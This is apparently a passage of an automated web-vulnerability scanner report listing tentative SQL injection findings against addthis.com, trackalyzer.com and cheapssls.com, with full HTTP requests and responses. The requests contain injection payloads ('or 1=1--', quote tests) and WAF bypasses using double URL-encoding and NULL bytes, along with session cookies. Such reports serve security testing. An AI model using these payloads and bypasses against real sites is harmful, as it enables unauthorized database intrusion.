Set-Cookie: sglst=41bb00v00t044m9w00arr9w00dnh9u303td9w00arp9u30f7u9u307219w000kn9w00a6p9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:49 GMT; Path=/
Set-Cookie: rdrlst=41l0sh6lqyjef0000001i6u1i0m79lqyjec000000206u200xv3lqyjec0000001z6u1z0m7dlqyjee0000001p6u1p16pilqyjea000000296u290x18lqyjee0000001q6u1q18ldlqyjeb000000286u280moulqyjee0000001o6u1o0moqlqyjeb000000236u2318etlqyjea000000296u290dhxlqyjea000000296u2918lqlqyjea0000002a6u2a14hnlqyjea000000296u2914khlqyjea000000296u291196lqyjea0000002d6u2d1195lqyjea0000002e6u2e1194lqyje90000002f6u2f00c1lqyjee0000001q6u1q1193lqyje90000002g6u2g1axvlqyjee0000001m6u1m1192lqyje70000002m6u2m10tylqyje90000002h6u2h0cablqyjee0000001q6u1q06pblqyjee0000001q6u1q07sylqyjee0000001q6u1q18w4lqyjef0000001l6u1l10telqyje80000002i6u2i16d5lqyjee0000001q6u1q159elqyjee0000001n6u1n10rdlqyje80000002j6u2j0m3zlqyjec000000216u210miwlqyjec000000226u221ad8lqyje80000002k6u2k18k9lqyjeb000000276u270m0slqyjee0000001r6u1r0m43lqyjed0000001s6u1s0m0olqyjeb000000246u241679lqyjed0000001t6u1t12qnlqyje70000002l6u2l0mjdlqyjeb000000256u250mjhlqyjed0000001u6u1u1671lqyjeb000000266u260lw4lqyjea000000296u290lm1lqyjed0000001v6u1v0rzglqyjef0000001j6u1j18kzlqyjea0000002b6u2b17gxlqyjea000000296u290lm5lqyjed0000001w6u1w0lltlqyjec0000001x6u1x0zpelqyjea000000296u290llxlqyjec0000001y6u1y18knlqyjea0000002c6u2c18hblqyjef0000001k6u1k0afolqyjee0000001q6u1q0kkjlqyjee0000001q6u1q14b
...[SNIP]...

1.2. http://ds.addthis.com/red/psi/sites/vasco.com/p.json [uit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ds.addthis.com
Path:   /red/psi/sites/vasco.com/p.json

Issue detail

The uit cookie appears to be vulnerable to SQL injection attacks. The payloads 97382001'%20or%201%3d1--%20 and 97382001'%20or%201%3d2--%20 were each submitted in the uit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /red/psi/sites/vasco.com/p.json?callback=_ate.ad.hpr&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1wh4476 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=197382001'%20or%201%3d1--%20

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:34 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:34 GMT; Path=/
Set-Cookie: di=%7B%7D..1315071154.10R|1315071154.1FE|1315071154.1OD|1315071154.60|1315071154.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:21 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:34 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

Request 2

GET /red/psi/sites/vasco.com/p.json?callback=_ate.ad.hpr&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1wh4476 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=197382001'%20or%201%3d2--%20

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:34 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:34 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:34 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

1.3. http://t4.trackalyzer.com/trackalyze.asp [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://t4.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The i parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the i parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /trackalyze.asp?r=None&p=http%3A//vasco.com/&i=10538' HTTP/1.1
Host: t4.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 03 Sep 2011 17:33:13 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Content-Length: 270
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fvasco%2Ecom%2F; expires=Sun, 04-Sep-2011 07:00:00 GMT; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font>
<p>
<font face="Arial" size=2>Type mismatch: 'cint'</font>
<p>
<font face="Arial" si
...[SNIP]...

Request 2

GET /trackalyze.asp?r=None&p=http%3A//vasco.com/&i=10538'' HTTP/1.1
Host: t4.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response 2

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sat, 03 Sep 2011 17:33:14 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t4.trackalyzer.com/0.gif
Content-Length: 152
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fvasco%2Ecom%2F; expires=Sun, 04-Sep-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t4.trackalyzer.com/0.gif">here</a>.</body>

1.4. http://www.cheapssls.com/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php'?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:00 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php''?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:02 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:02 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.5. http://www.cheapssls.com/index.php [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:29 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=1c2uhdfvhbepsaec7mkm3aing7; expires=Sat, 17-Sep-2011 21:55:29 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:28 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:30 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:30 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.6. http://www.cheapssls.com/index.php [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:54:18 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:54:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:54:17 GMT
Content-Length: 1048

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': { '5b91fafac406f3f976c0427201da50c5': {
...[SNIP]...

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:54:53 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:54:53 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.7. http://www.cheapssls.com/index.php [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1%00'
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:05 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=ncc9kj9io45uoj9fi65bo55df5; expires=Sat, 17-Sep-2011 21:55:05 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:04 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1%00''
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:07 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:08 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.8. http://www.cheapssls.com/index.php [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
Content-Length: 791
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1'
